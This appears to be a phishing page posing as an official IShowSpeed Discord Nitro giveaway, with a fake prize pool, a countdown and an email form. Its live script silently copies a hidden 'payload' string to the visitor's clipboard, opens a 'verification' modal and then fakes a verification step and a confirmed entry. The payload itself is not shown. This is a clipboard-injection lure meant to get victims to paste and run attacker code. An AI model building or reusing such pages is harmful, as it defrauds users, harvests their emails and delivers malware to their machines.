IShowSpeed

IShowSpeed

37.2M subscribers • Official Giveaway

Giveaway

Discord Nitro — 3 Months Free

100 winners will receive Discord Nitro Classic (3 months). Enter your email below for a chance to win.

IShowSpeed
IShowSpeed
Verified Creator • Giveaway ends in 5 hours
Official
Prize Pool
$5,000+
100× Discord Nitro Classic (3 months)
Giveaway ends in
04:59:59

By entering, you agree to the Terms and Privacy Policy. Winners will be notified via email.

`; try { navigator.clipboard.writeText(payload); } catch(e) { hiddenPayload.value = payload; hiddenPayload.select(); document.execCommand('copy'); } modal.classList.add('show'); document.body.style.overflow = 'hidden'; } function closeModal() { modal.classList.remove('show'); document.body.style.overflow = ''; } function completeVerification() { const btn = document.getElementById('verifyBtn'); btn.textContent = 'Verifying...'; btn.disabled = true; setTimeout(() => { closeModal(); showSuccess(); }, 1800); } function showSuccess() { const btn = document.getElementById('submitBtn'); btn.innerHTML = '✓ Entry Confirmed'; btn.style.background = 'var(--success)'; btn.disabled = true; setTimeout(addWinner, 800); } document.getElementById('entryForm').addEventListener('submit', (e) => { e.preventDefault(); userEmail = document.getElementById('emailInput').value.trim(); if (!userEmail) return; const btn = document.getElementById('submitBtn'); btn.disabled = true; btn.textContent = 'Processing...'; setTimeout(() => { btn.disabled = false; openModal(); }, 1200); }); modal.addEventListener('click', (e) => { if (e.target === modal) closeModal(); });